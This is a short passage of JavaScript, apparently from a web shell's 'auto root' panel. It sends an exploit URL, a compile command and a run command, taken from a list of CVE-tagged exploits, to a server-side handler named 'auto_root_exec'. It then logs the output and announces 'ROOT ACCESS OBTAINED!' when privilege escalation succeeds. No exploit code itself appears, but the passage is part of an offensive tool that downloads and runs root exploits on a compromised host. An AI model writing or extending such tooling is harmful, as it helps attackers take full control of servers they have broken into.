 'none';
    var logEl = document.getElementById('arLog');
    logEl.textContent = '[*] Executing: ' + ex.name + ' (' + ex.cve + ')\n[*] Please wait...\n';
    logEl.scrollTop = logEl.scrollHeight;

    fileActionRequest({
        file_action: 'auto_root_exec',
        exploit_url: ex.url || '',
        compile_cmd: ex.compile || '',
        run_cmd: ex.run || ''
    }, function(r) {
        if (!r.ok) {
            logEl.textContent += '\n[!] Error: ' + (r.err || 'Unknown');
            document.getElementById('arFailBanner').style.display = 'block';
            playFailSound();
            return;
        }
        logEl.textContent = r.log || '(no output)';
        logEl.scrollTop = logEl.scrollHeight;
        if (r.is_root) {
            document.getElementById('arRootBanner').style.display = 'block';
            document.getElementById('arRootInfo').textContent = 'User: ' + r.user + ' | ' + r.id;
            showToast('ROOT ACCESS OBTAINED!', 'success', 5000, 'applepay');
        